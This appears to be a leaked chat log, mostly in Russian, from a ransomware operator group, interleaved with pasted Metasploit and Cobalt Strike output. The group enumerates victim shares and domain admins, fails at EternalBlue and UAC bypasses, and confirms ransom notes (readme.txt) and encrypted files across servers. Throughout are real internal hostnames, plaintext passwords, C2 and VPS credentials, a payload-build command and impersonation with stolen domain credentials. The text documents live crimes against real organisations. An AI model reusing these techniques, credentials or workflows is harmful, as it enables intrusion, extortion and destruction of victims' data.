\\USCHI-VHH010.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-VHH010.Hobbes.loc\C$ - Default share
\\USCHI-VHH010.Hobbes.loc\E$ - Default share
\\USCHI-VHH010.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIDCG003.Hobbes.loc\C$ - Default share
\\PCHIDCG003.Hobbes.loc\IPC$ - Remote IPC
\\PCHIDCG003.Hobbes.loc\NETLOGON - Logon server share
\\PCHIDCG003.Hobbes.loc\slETL$ -
\\PCHIDCG003.Hobbes.loc\SYSVOL - Logon server share
\\PCHIAPG011.Hobbes.loc\ADMIN$ - Remote Admin
\\PCHIAPG011.Hobbes.loc\C$ - Default share
\\PCHIAPG011.Hobbes.loc\IPC$ - Remote IPC
\\PCHIAPG011.Hobbes.loc\Lenel$ -
\\USCHI-PWA001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-PWA001.Hobbes.loc\C$ - Default share
\\USCHI-PWA001.Hobbes.loc\E$ - Default share
\\USCHI-PWA001.Hobbes.loc\F$ - Default share
\\USCHI-PWA001.Hobbes.loc\G$ - Default share
\\USCHI-PWA001.Hobbes.loc\H$ - Default share
\\USCHI-PWA001.Hobbes.loc\IPC$ - Remote IPC
\\DAG01.Hobbes.loc\ClusterStorage$ - Cluster Shared Volumes Default Share
\\DAG01.Hobbes.loc\IPC$ - Remote IPC
\\DT-000033.Hobbes.loc\A$ - Default share
\\DT-000033.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000033.Hobbes.loc\C$ - Default share
\\DT-000033.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\ActiveInk -
\\SQL0005.Hobbes.loc\ADMIN$ - Remote Admin
\\SQL0005.Hobbes.loc\C$ - Default share
\\SQL0005.Hobbes.loc\E$ - Default share
\\SQL0005.Hobbes.loc\F$ - Default share
\\SQL0005.Hobbes.loc\G$ - Default share
\\SQL0005.Hobbes.loc\IPC$ - Remote IPC
\\SQL0005.Hobbes.loc\Temp -
\\USCHI-WSUS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-WSUS001.Hobbes.loc\C$ - Default share
\\USCHI-WSUS001.Hobbes.loc\E$ - Default share
\\USCHI-WSUS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-WSUS001.Hobbes.loc\UpdateServicesPackages - A network share to be used by client systems for collecting all software packages (usually applications) published on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WsusContent - A network share to be used by Local Publishing to place published content on this WSUS system.
\\USCHI-WSUS001.Hobbes.loc\WSUSTemp - A network share used by Local Publishing from a Remote WSUS Console Instance.
\\USCHI-NET002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-NET002.Hobbes.loc\AdminUIContentPayload - AdminUIContentPayload share for AdminUIContent Packages
\\USCHI-NET002.Hobbes.loc\C$ - Default share
\\USCHI-NET002.Hobbes.loc\Client -
\\USCHI-NET002.Hobbes.loc\D -
\\USCHI-NET002.Hobbes.loc\DeploymentShare$ - MDT Deployment Share
\\USCHI-NET002.Hobbes.loc\Drivers -
\\USCHI-NET002.Hobbes.loc\E$ - Default share
\\USCHI-NET002.Hobbes.loc\EasySetupPayload - EasySetupPayload share for EasySetup Packages
\\USCHI-NET002.Hobbes.loc\F -
\\USCHI-NET002.Hobbes.loc\F$ - Default share
\\USCHI-NET002.Hobbes.loc\ImagesFiles -
\\USCHI-NET002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-NET002.Hobbes.loc\print$ - Printer Drivers
\\USCHI-NET002.Hobbes.loc\REMINST - RemoteInstallation
\\USCHI-NET002.Hobbes.loc\SCCMContentLib$ - 'Configuration Manager' Content Library for site CHI (3/6/2015)
\\USCHI-NET002.Hobbes.loc\SMPSTOREF_63F684E9$ - SMS SMP Share
\\USCHI-NET002.Hobbes.loc\SMSPKGF$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMSSIG$ - SMS Site CHI DP 3/6/2015
\\USCHI-NET002.Hobbes.loc\SMS_CHI - SMS Site CHI 09/21/20
\\USCHI-NET002.Hobbes.loc\SMS_CPSC$ - SMS Compressed Package Storage
\\USCHI-NET002.Hobbes.loc\SMS_DP$ - ConfigMgr Site Server DP share
\\USCHI-NET002.Hobbes.loc\SMS_OCM_DATACACHE - OCM inbox directory
\\USCHI-NET002.Hobbes.loc\SMS_SITE - SMS Site CHI 09/21/20
\\USCHI-NET002.Hobbes.loc\SMS_SUIAgent - SMS Software Update Installation Agent -- 09/21/20
\\USCHI-NET002.Hobbes.loc\SourceFiles -
\\USCHI-BKP110.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-BKP110.Hobbes.loc\C$ - Default share
\\USCHI-BKP110.Hobbes.loc\E$ - Default share
\\USCHI-BKP110.Hobbes.loc\F$ - Default share
\\USCHI-BKP110.Hobbes.loc\G$ - Default share
\\USCHI-BKP110.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-BKP110.Hobbes.loc\VBRCatalog -
\\USCHI-CAS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-CAS001.Hobbes.loc\C$ - Default share
\\USCHI-CAS001.Hobbes.loc\CertEnroll - Active Directory Certificate Services share
\\USCHI-CAS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS001.Hobbes.loc\C$ - Default share
\\USCHI-SBS001.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS001.Hobbes.loc\SkypeShare -
\\USCHI-SBS001.Hobbes.loc\SkypeShare1 -
\\USCHI-SBS001.Hobbes.loc\Users -
\\USCHI-SBS001.Hobbes.loc\xds-replica - Share used for Skype for Business Server replication
\\USCHI-SBS002.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS002.Hobbes.loc\C$ - Default share
\\USCHI-SBS002.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-EM-LT400.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-EM-LT400.Hobbes.loc\C$ - Default share
\\USCHI-EM-LT400.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\A$ - Default share
\\DT-000025.Hobbes.loc\ADMIN$ - Remote Admin
\\DT-000025.Hobbes.loc\C$ - Default share
\\DT-000025.Hobbes.loc\IPC$ - Remote IPC
\\DT-000025.Hobbes.loc\print$ - Printer Drivers
\\USCHI-SBS003.Hobbes.loc\ADMIN$ - Remote Admin
\\USCHI-SBS003.Hobbes.loc\C$ - Default share
\\USCHI-SBS003.Hobbes.loc\IPC$ - Remote IPC
\\USCHI-SBS003.Hobbes.loc\print$ - Printer Drivers

``````
Alias name Administrators
Comment

Members

-------------------------------------------------------------------------------
Administrator
HOBBES\AdamsK
HOBBES\Domain Admins
HOBBES\SUPPORT
HOBBES\IT-WKSTN-SUPP
HOBBES\PCADMIN

``конфуконфу@tl1``
Group name Enterprise Admins
Comment Designated administrators of the enterprise

Members

-------------------------------------------------------------------------------
DILBERT MS-0001 RAMIREZJ
SPS19-Admin SPS-DB-2019 SPS-TS-2019
SVC-NWA001
```

```
Domain Controllers:

 Server Name IP Address
 ----------- ----------
 PCHIDCG003 10.20.32.100
 PCHIDCG004 10.20.32.28
 USCHI-DCP001 10.20.32.175
 USCHA-DCG002 10.6.0.56
 USCHI-DCG003 10.20.32.103
 USCHI-DCG001 10.20.32.101
 PCHIDCG002 10.111.2.20
``````
Group name Domain Admins
Comment Designated administrators of the domain

Members

-------------------------------------------------------------------------------
DILBERT ePOScan Exchange Service
LaiP MITORATJ MS-0001
PCHIAPG009 PCHIAPG014 PCHIDBG001
RAMIREZJ SAVDeploy SCCMadmin
SCOMaction SLADMIN SPS19-Admin
SPS-DB-2019 SPS-TS-2019 SQL0005
SVC-CAS SVC-ESRI SVC-NWA001
SVC-PW-DBG001 SVC-PWORCHFWK SVC-PW-ORCHFWK
SVC-PWPWD001 SVC-Veeam TAGGESE
TENGSERV UREJA USCHIPWA001
USCHIPWD001 USCHIPWW001

``AdFindгоуконфу``
expFederal.com
``и тоже без доменаагавам там еще одна сессия прилетела даже с лау всехправила знаетенапишите логины в личку для админки билдера шелкодаво входной еще сесиятогда ищем впндомен не доступенживаяу меня в кобе висит еще сесиякто снял ад инфо?```
meterpreter > getsystem
[2001: Operation failed: Access is denied. The following was attempted:
[Named Pipe Impersonation (In Memory/Admin)
[Named Pipe Impersonation (Dropper/Admin)
[Token Duplication (In Memory/Admin)
[Named Pipe Impersonation (RPCSS variant)
meterpreter >
[*] 10.0.0.115 - Meterpreter session 7 closed.  Reason: Died

``отвалисьработал из входнойхотя мой домен оттуда пингуетсямне эти сессиине летят в кобуи дайте доменснимите ад юзерс+как я вижу он себе пасснулберите в работу ту сетку из кобы вдвоем с @user3ну элевейт эксплойтом получится
а байпасснуть юак - нетчерез елевейту @user7 как-то раз получилось подняться не ЛАчем черт не шутитэто понятно``
Опробовал кучу bypassuac'ов - все ругаются так:
```
когда текущий пользователь не в локал админ группе нет смысла пытаться байпасить юак+``
beacon> net domain
[*] Tasked beacon to run net domain
[+] host called home, sent: 257 bytes
``домен все еще не резолвится?Много разных кред``
http://citrixen.peptide.cn/citrix/xenapp/auth/login.aspx
```

Вин серв 2008

Все пользователи, креды от которых есть, находятся на одном компе
ЛА среди них нет
Домен не отзывается
Конфигов ВПН нет
Шар нет
Кредов в txt и тп нет

На MS17 уязвимости нет:
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
```
[*] Started reverse TCP handler on 173.234.155.45:9875
[192.168.1.190:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[192.168.1.190:445 - Scanned 1 of 1 hosts (100% complete)
[192.168.1.190:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit completed, but no session was created.
```

Прокинул в метерпретер через мультихендлер:
`getsystem` - мимо

Опробовал кучу bypassuac'ов - все ругаются так:
`Not in admins group, cannot escalate with this module`
Либо так:
`not-vulnerable: Target is not vulnerable`

Попробовал это (This module attempts to exploit existing administrative privileges to obtain a SYSTEM session)
Тоже не шибко помогло:
```
msf6 exploit(windows/local/service_permissions) > exploit

[*] Trying to add a new service...
[*] Trying to find weak permissions in existing services..
[*] [CitrixICAFileSigningService] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\DeliveryServices\ICAFileSigningService\Citrix.DeliveryServices.ICASign.ServiceHost.exe"
[*] [Citrix_GTLicensingProv] Cannot reliably determine path: "C:\Program Files (x86)\Citrix\Licensing\LicWMI\Citrix_GTLicensingProv.exe"
[+] [HipsDaemon] Write access to C:\Program Files (x86)\Huorong\Sysdiag\bin\HipsDaemon.exe
[+] [knbcenter] Write access to D:\Program Files (x86)\liebao\6.5.115.18480\KNBCenter.exe
[*] [TermServLicensing] Cannot reliably determine path: C:\Windows\system32\svchost -k TSLicensing
```батька не оценит этого[ ](https://mediaeveryone.com/channel/general?msg=8aL7r47YQBW2B3L83) я говорил о логинах, паролях, именах, коментах, файлах[ ](https://mediaeveryone.com/channel/general?msg=ugbQDs48KqS6Tt8RW) неаТы говорил о логинах о паролях речи не былоа еще будут?[ ](https://mediaeveryone.com/channel/general?msg=HJkjZDuH55qPtgNXX) да блять я сколько говорил?возьмите в работу3 сесситам 1 сеткада@tl1 разбираем сессии?Смена пароля passwd``
23.106.160.50 p17464
pwd:Lukashenko228!
```пока продолжаем работу по старым задачамтак ладно есть проблемы с кобойДавай лучше на centOS следубщиевсе разобралсяЭто нужно каждый раз делать когда заходишь по ssh`/usr/bin/bash`
укажи в шелКонечноавтоматом получишь хом дир``
useradd -m username --shell "shell path" && passwd username
``пасс задал?создайте пока себе листыбля.... Ты серьезно... Наверно я попробовал прежде чем писать и когда указываешь явно нужно писать вместе с юзером.только имя хом диры, она сама создается в /homeкогда указываешь каталог не надо писать полный путьможно centOS или чистую Deb там такой хуйни не бываетне понимаю что с vds создаю usera с явным указанием каталога useradd -m -d /home/user3

ОтАвторизуюсь в новом терминале и вижу это ```
 * Ubuntu 20.04 LTS is out, raising the bar on performance, security,
   and optimisation for Intel, AMD, Nvidia, ARM64 and Z15 as well as
   AWS, Azure and Google Cloud.

     https://ubuntu.com/blog/ubuntu-20-04-lts-arrives


0 updates can be installed immediately.
0 of these updates are security updates.


$ ды
-sh: 1: ды: not found
$ ls
$


```
Указываю так mkhomedir_helper user3
тоже не помогает. Проверяю cat /etc/passwd ```
user3:x:1000::/home/user3:/bin/sh

``ждем сессий, разбираем, работаемкоба``
206.221.186.34:44482
pqtbjTVtIMYBudInFs7VVoZDHjDvqtAR1v
```текущие откладываем кроме @user4так переходим дальшеокейшоб не затерялосьможет отдельный канал для фидбэка?по доп модулям - ссылка + причина/описаниеНужно сделать чтоб командами кербы собирались, из коробки работал смбавто брут, была возможность загружать файлы, одной команой снимать адфайнд, одной команой выводить да,ла и прочую нечесть. Это как минимум[ ](https://mediaeveryone.com/channel/general?msg=bDpJ3zLXSYmxHhHrY) PowerView.ps1[ ](https://mediaeveryone.com/channel/general?msg=5yjoSi3NSkCQSnsir) что за превью?[ ](https://mediaeveryone.com/channel/general?msg=crkwCi6fnbuPQTLDW) конкретнее, линки на гит и прочеечто то что привелегии подниметну как минимум туда бы по дефолту повервью встроить[ ](https://mediaeveryone.com/channel/general?msg=dmJFPzMKqLbG5fg9C) ссылки и прочее, что необходимо[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) в основном баги, окей[ ](https://mediaeveryone.com/channel/general?msg=TWStQoGThWpNCeeya) ++Нет возможности скачать файлы с клиентского пк, в птш скачивается(видно Download Files), но от туда не скачивается(открывается новая вкладка - server not found.
Хотелось бы импортировать скрипты напрямую с пк в птш, а не по ссылке.
Проблемы с сокетами - прилетает по две-три сессии. Работешь в одной сесии, пишешь команду, а она дублируется два или три раза, столько же, сколько прилетело сессийинструментарии встроенный мог быть побогаче...ну в кобе это реже в разывряд ли претензия к инструменту, коба в условиях жопы тоже часто мрет или не стучит)оч часто сесии мрут, что есть минус))))так там и кнопка файлов есть .... ммвообще она синяяда, я тоже не смог найти пока не сказали что там естькнопки видимыебаг[ ](https://mediaeveryone.com/channel/general?msg=7djo2SGBKa9nAjEax) про строку сверху?больше нечего сказатьхотелось бы нормальную панель, а не белый прямоугольник
в остальном старался избегать использования и переносил сессию в кобу@all все кто юзал тпш отпишите юзер экспириенс сюда одним большим сообщением, пожалуйста. разделите + и -, что норм и т д, чтобы хотелось. что лишнее. дайте фидбэкстатус пиши в конфу сразуокдая вчера их проверял, повторить?на наличие записки + доступностьна что?проверь все сервера sisd.netя наверно..кто сейчас свободнее?Настрою под msfразверните себе арму там и работайте вместесегодня придется потерпетьОдна на всех это не вариант. В арму подтягивается вся подсеть если сканить. + будет гемор если работать одновременно в арме еще в msfну с того времени опыта у вас прибавилось поэтому можете попробовать еще раз)я уже не помню, у нас изначально одна на всех была. и че то было что по очереди работаликонфликтовать в чем?так вроде конфликтовать будет, если на толпуно там еще и старая отвалилась поэтому пока одна на всехнет. всем нуждающимся в замен старойв смысле это на одного?не забывайте удалять за собой инактив сесси``
23.106.160.50:17464
HJ6Hmf7KNP3w2w7HCtprxRHGg6q92E9LsvWLv98y
``скину сюда доступы, пусть кто-то один настроитвпс под мсф подъехалскину тебе х86 дллстраннодаа у тебя пл х64?`./shellConcatination --source=shellStarter_llvm_x64.dll -keep -self --target=pl64.dll --addBin=pl.bin` так собирал, пайлоад х64 чекчек разрядность системытип х86 ?как собирал и запускал?если бы все прошло успешно доменная авторизация должна была уеретьпочему?плохо(```

beacon> ls \\admindc1\c$
[*] Tasked beacon to list files in \\admindc1\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc1\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/10/2020 08:19:50 $Recycle.Bin
          dir 12/08/2020 23:30:15 AdminDC1
          dir 12/08/2020 23:30:15 batch
          dir 12/08/2020 23:30:15 ck-agent
          dir 10/26/2018 09:36:07 Documents and Settings
          dir 12/08/2020 23:30:15 inetpub
          dir 12/08/2020 23:30:16 Logs
          dir 12/09/2020 12:27:52 MSI
          dir 10/26/2018 13:40:56 PerfLogs
          dir 12/08/2020 23:30:16 Program Files
          dir 12/09/2020 02:24:43 Program Files (x86)
          dir 12/08/2020 23:30:16 ProgramData
          dir 12/08/2020 23:30:16 Recovery
          dir 12/08/2020 23:30:10 System Volume Information
          dir 10/12/2020 15:18:46 temp
          dir 12/08/2020 23:30:16 Users
          dir 12/02/2020 03:33:28 Windows
          dir 12/08/2020 23:30:16 Zabbix_Agent
 1kb fil 12/08/2020 23:30:15 AdminDC1.admin.sisd.k12_admindc1(8).req.HWOEU
 1kb file 12/08/2020 23:30:15 admindc1.cer.HWOEU
 375kb file 07/16/2016 07:18:08 bootmgr
 535b thread 12/08/2020 23:30:15 BOOTNXT.HWOEU
 16gb file 11/13/2020 07:53:40 pagefile.sys
 1kb file 12/08/2020 23:30:15 readme.txt
 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc2\c$
[*] Tasked beacon to list files in \\admindc2\c$
[+] host called home, sent: 31 bytes
[-] could not open \\admindc2\c$\*: 53
beacon> ls \\admindc3\c$
[*] Tasked beacon to list files in \\admindc3\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc3\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/28/2019 07:12:07 $Recycle.Bin
          dir 12/08/2020 23:32:07 ck-agent
          dir 12/09/2020 02:39:28 Config.Msi
          dir 10/26/2018 15:02:45 Documents and Settings
          dir 12/08/2020 23:32:08 Logs
          dir 10/29/2018 14:52:44 PerfLogs
          dir 12/08/2020 23:32:08 Program Files
          dir 12/09/2020 02:39:18 Program Files (x86)
          dir 12/08/2020 23:32:08 ProgramData
          dir 12/08/2020 23:32:08 Recovery
          dir 12/08/2020 21:50:51 System Volume Information
          dir 12/08/2020 23:32:08 Users
          dir 12/02/2020 03:45:13 Windows
          dir 12/08/2020 23:32:08 Zabbix_Agent
 375kb file 07/16/2016 07:18:08 bootmgr
 535b file 12/08/2020 23:32:07 BOOTNXT.HWOEU
 16gb file 11/13/2020 16:25:59 pagefile.sys
 1kb file 12/08/2020 23:32:07 readme.txt
 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc4\c$
[*] Tasked beacon to list files in \\admindc4\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc4\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:34:37 $Recycle.Bin
          dir 12/08/2020 23:32:33 ck-agent
          dir 10/29/2018 09:10:11 Documents and Settings
          dir 12/08/2020 23:32:35 Logs
          dir 10/29/2018 13:19:55 PerfLogs
          dir 12/08/2020 23:32:35 Program Files
          dir 12/09/2020 02:41:13 Program Files (x86)
          dir 12/08/2020 23:32:35 ProgramData
          dir 12/08/2020 23:32:35 Recovery
          dir 12/08/2020 23:32:28 System Volume Information
          dir 12/08/2020 23:32:35 Users
          dir 11/17/2020 13:36:48 Windows
          dir 12/08/2020 23:32:35 Zabbix_Agent
 375kb file 07/16/2016 07:18:08 bootmgr
 535b file 12/08/2020 23:32:33 BOOTNXT.HWOEU
 16gb file 11/17/2020 13:46:41 pagefile.sys
 1kb file 12/08/2020 23:32:33 readme.txt
 40mb file 12/09/2020 08:06:26 redcloak.msi

beacon> ls \\admindc5\c$
[*] Tasked beacon to list files in \\admindc5\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\admindc5\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 07/11/2019 13:42:13 $Recycle.Bin
          dir 12/08/2020 20:24:33 $SNAP_2020120302_VOLUMEC$
          dir 12/08/2020 20:24:33 AdminDC1
          dir 12/08/2020 20:24:33 ck-agent
          dir 10/29/2018 09:48:27 Documents and Settings
          dir 12/08/2020 20:24:33 iboss-ad-installers-110818
          dir 12/08/2020 20:24:35 Logs
          dir 10/29/2018 14:45:30 PerfLogs
          dir 12/08/2020 20:24:35 Program Files
          dir 12/09/2020 02:48:53 Program Files (x86)
          dir 12/08/2020 20:24:35 ProgramData
          dir 12/08/2020 20:24:36 Recovery
          dir 12/08/2020 20:24:28 System Volume Information
          dir 12/08/2020 20:24:36 Users
          dir 12/02/2020 02:48:40 Windows
          dir 12/08/2020 20:25:25 Zabbix_Agent
 375kb file 07/16/2016 07:18:08 bootmgr
 535b file 12/08/2020 20:24:33 BOOTNXT.HWOEU
 16gb file 11/13/2018 11:25:20 pagefile.sys
 1kb file 12/08/2020 20:24:33 readme.txt
``сними список дк проверь ихя щас на azuredcдк доступен?
beacon> ls \\dhcp02\c$
[*] Tasked beacon to list files in \\dhcp02\c$
[+] host called home, sent: 29 bytes
[*] Listing: \\dhcp02\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 04/22/2016 01:52:17 $Recycle.Bin
          dir 12/08/2020 23:09:27 clu
          dir 12/08/2020 23:09:27 compaq
          dir 12/09/2020 11:37:37 Config.Msi
          dir 12/08/2020 23:09:27 cpqsystem
          dir 08/22/2013 08:48:41 Documents and Settings
          dir 12/08/2020 23:09:27 hp
          dir 08/22/2013 09:52:33 PerfLogs
          dir 12/08/2020 23:09:27 Program Files
          dir 12/09/2020 02:49:13 Program Files (x86)
          dir 12/09/2020 12:55:15 ProgramData
          dir 12/08/2020 23:09:22 System Volume Information
          dir 12/08/2020 23:09:27 Users
          dir 09/21/2020 10:12:03 Windows
          dir 12/08/2020 23:09:27 zabbix_agent
 389kb file 09/30/2013 15:37:02 bootmgr
 535b file 12/08/2020 23:09:27 BOOTNXT.HWOEU
 5kb file 12/08/2020 23:09:27 cpqsprt.trace.HWOEU
 3gb file 06/01/2020 10:32:41 pagefile.sys
 23kb file 12/08/2020 23:09:27 PHH_wirless2.txt.HWOEU
 1kb file 12/08/2020 23:09:27 readme.txt
 40mb file 12/09/2020 08:06:26 redcloak.msi
 3kb file 12/08/2020 23:09:27 smh_installer.log.HWOEU
 615b file 12/08/2020 23:09:27 zabbix_agentd.log.HWOEU

beacon> ls \\kms\c$
[*] Tasked beacon to list files in \\kms\c$
[+] host called home, sent: 26 bytes
[*] Listing: \\kms\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 09/15/2018 01:19:00 $Recycle.Bin
          dir 03/30/2020 09:58:18 Documents and Settings
          dir 05/29/2020 10:17:56 PerfLogs
          dir 12/08/2020 20:58:12 Program Files
          dir 12/08/2020 20:58:12 Program Files (x86)
          dir 12/08/2020 20:58:12 ProgramData
          dir 12/08/2020 20:58:12 Recovery
          dir 12/08/2020 20:58:07 System Volume Information
          dir 12/08/2020 20:58:12 Users
          dir 05/29/2020 10:17:57 Windows
 1gb file 05/29/2020 10:18:36 pagefile.sys
 1kb file 12/08/2020 20:58:12 readme.txt

beacon> ls \\hyperv24\c$
[*] Tasked beacon to list files in \\hyperv24\c$
[+] host called home, sent: 31 bytes
[*] Listing: \\hyperv24\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 12/08/2020 22:10:00 Avamar
          dir 11/06/2020 08:02:07 ClusterStorage
          dir 11/05/2020 16:57:08 Documents and Settings
          dir 11/06/2020 07:32:25 PerfLogs
          dir 12/08/2020 22:10:00 Program Files
          dir 12/09/2020 09:05:16 Program Files (x86)
          dir 12/08/2020 22:10:00 ProgramData
          dir 12/08/2020 22:10:00 Recovery
          dir 12/08/2020 22:09:56 System Volume Information
          dir 12/09/2020 09:04:58 Users
          dir 11/06/2020 07:55:21 Windows
          dir 12/08/2020 22:10:00 Zabbix_Agent
 839b fil 12/08/2020 22:10:00 NWT_hotfix_report.html.HWOEU
 526kb file 12/08/2020 22:10:00 NWT_Install.log.HWOEU
 384kb file 12/08/2020 22:10:00 NWT_Nimble_DSM_Install.log.HWOEU
 19gb file 11/06/2020 07:57:46 pagefile.sys
 1kb file 12/08/2020 22:10:00 readme.txt
 40mb file 12/09/2020 08:06:26 redcloak.msi


```проверил 3 везде ридми естьа проверьте что нибудь соседнее под кредами ДАок)всемвсем или тем у кого затык на текущих?давненько у нас с вами такого формата не было)у вас около 1.5 часов еще на работу по текущим, потом выдам доступы в кобу и оттуда уже будем снова разбирать в работу``
 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/09/2020 09:34:10 $Recycle.Bin
          dir 07/10/2020 13:27:44 Documents and Settings
          dir 12/08/2020 23:33:21 Packages
          dir 07/10/2020 12:14:14 PerfLogs
          dir 12/08/2020 23:33:21 Program Files
          dir 12/09/2020 08:44:13 Program Files (x86)
          dir 12/08/2020 23:33:21 ProgramData
          dir 12/08/2020 23:33:21 Recovery
          dir 12/08/2020 23:33:16 System Volume Information
          dir 12/08/2020 23:33:21 Users
          dir 07/21/2020 11:40:36 Windows
          dir 07/2020 14:24:04 WindowsAzure
 380kb file 11/21/2016 00:36:43 bootmgr
 535b file 12/08/2020 23:33:21 BOOTNXT.HWOEU
 1kb file 12/08/2020 23:33:21 readme.txt
```ридми есть[ ](https://mediaeveryone.com/channel/general?msg=yaydbDsTYtNmBckJn) а проверь корень диска Снету у меня, вообще всё пусто, очистил недавно кобуоднаа у вас в sisd много живых сессий?судя по китайской cmd далеко трафик летит)у сесси кста при слипе 5 отклик минутане пробовалвсе мимо или не пробовал?-помимо мс17?ща попробую посканить этот комп на мс17>никто из них неЛА, кредов нетгде?я ж написала по лпе направлению что?[ ](https://mediaeveryone.com/channel/general?msg=7i8e3ue3CvTy5Mhti) в общем здесь все пользователи на одном компе, никто из них не ЛА, домен не отзывается, конфигов впн нет, шар нет, кредов нетпока нетВопрос - можно кобу почистить от sisd.net сессий?[ ](https://mediaeveryone.com/channel/general?msg=zfdbDky5Ae6mwQgxR) окте кто просил впс под мсф - во второй половине дняесли вопросов нет, то приступаем к работедень добрыйВсем приветhiокей)несколько рандомных проверил - даридми появился на армах?```
Сервера
	Всего серверов по ад - 69
	Живых - 50
	Закрыто - 47 (нет дисков, шар,3389)

Сфера - снапшоты потерты

Армы
	Всего по ад - 322
	Живых - 140
	Закрыто - 118
```положите финальную стату последним сообщениема на армах кст появилась)1.done.korbel.com@tl1 закрывай тут всену и ладно
что могли - сделалида добито уже все)да
думаю все
добивайте если что живое осталось и ДКумерла сеть скорее всегопо ls
до того как отвались - везде была записка``
Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:27> make_token KORBEL\ben.mandeville 1234qwerASDF!@#$
[*] Tasked beacon to create a token for KORBEL\ben.mandeville
[+] host called home, sent: 56 bytes
[+] Impersonated KORBEL\daniel.harvey_adm
Teemo[COLODC1]daniel.harvey_adm */3192|20Dec23 05:03:34> ls \\10.10.13.14\C$
[*] Tasked beacon to list files in \\10.10.13.14\C$
[+] host called home, sent: 34 bytes
[-] could not open \\10.10.13.14\C$\*: 53
``на крайняк псек)на всякий случай чекда неттам рпс не доступен, вмик же тоже не будет работатьа вмик?)ну вот это и не рабоает)tasklist /v /s hostipвисит лиа, я думал процесdirls простону ты же под токеном видишь все дискиlsа как проверять то?)
вмик не работаетчтобы по сети добралось доступных шарда и думаю можно запускать с ДК тоже под контекстом ЖИВОГО домен админану тогда перепроверяйте сервера
где "встало" где нет )я рандомные пинганул - все доступны))спать хочешь уже?)shell ping 10.10.1.24 -n 1``
beacon> shell ping -n 10.10.1.24
[*] Tasked beacon to run: ping -n 10.10.1.24
[+] host called home, sent: 49 bytes
[+] received output:
IP address must be specified.

```сделайте репинг по серверам например глянуть че к чемуну посмотрите с ДК где живые тачки осталисьтам и дк живой естьне
есть виаем сессии на серверах живыеили кобу вышибло)либо рубанули траффик на кобальт этота все) они отключили сеть походу)echo 1 > Z:\test.txt?а и да, перепроверте все сервера где сесии умерли быстрокак будто не доступен для записи под контекстом
не понимаюдоступ к контекнту же естьно почему-то анэвэйлбл виситтак значит доступенотработакстати, а dir Z:\ отработает?с прямым указанием кред?он отвалится?ремапните 1и то верно :thinking:```
ls \\10.10.1.181\c$
[*] Tasked beacon to list files in \\10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/20/20 14:28:47 $Recycle.B
``а как был запрос тогда сейчас?)может потому что после шифровки дк поломалась авторизация и токен слетел?``
beacon> shell net use
[*] Tasked beacon to run: net use
[+] host called home, sent: 38 bytes
[+] received output:
New connections will be remembered.


Status Local Remote Network

-------------------------------------------------------------------------------
Unavailable Y: \\10.10.1.181\c$ Microsoft Windows Network
Unavailable Z: \\10.10.15.10\c$ Microsoft Windows Network
The command completed successfully.


beacon> ls \\10.10.1.181\c$
[*] Tasked beacon to list files in \\10.10.1.181\c$
[+] host called home, sent: 34 bytes
[*] Listing: \\10.10.1.181\c$\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 10/20/20 14:28:47 $Recycle.Bin
          dir 10/20/2020 20:38:31 Documents and Settings
          dir 12/16/2020 12:05:24 inetpub
          dir 10/20/2020 15:46:32 PerfLogs
          dir 11/30/2020 13:30:25 Program Files
          dir 11/30/2020 13:30:26 Program Files (x86)
          dir 12/22/2020 12:41:05 ProgramData
          dir 10/20/2020 20:38:33 Recovery
          dir 11/17/2020 15:49:30 SFTP_Root
          dir 10/20/2020 14:04:21 System Volume Information
          dir 10/29/2020 16:00:15 Users
          dir 11/30/2020 13:21:42 Windows
 380kb file 02/02/2018 10:37:03 bootmgr
 1b file 07/16/2016 06:18:08 BOOTNXT
 2gb file 12/21/2020 13:05:39 pagefile.sys
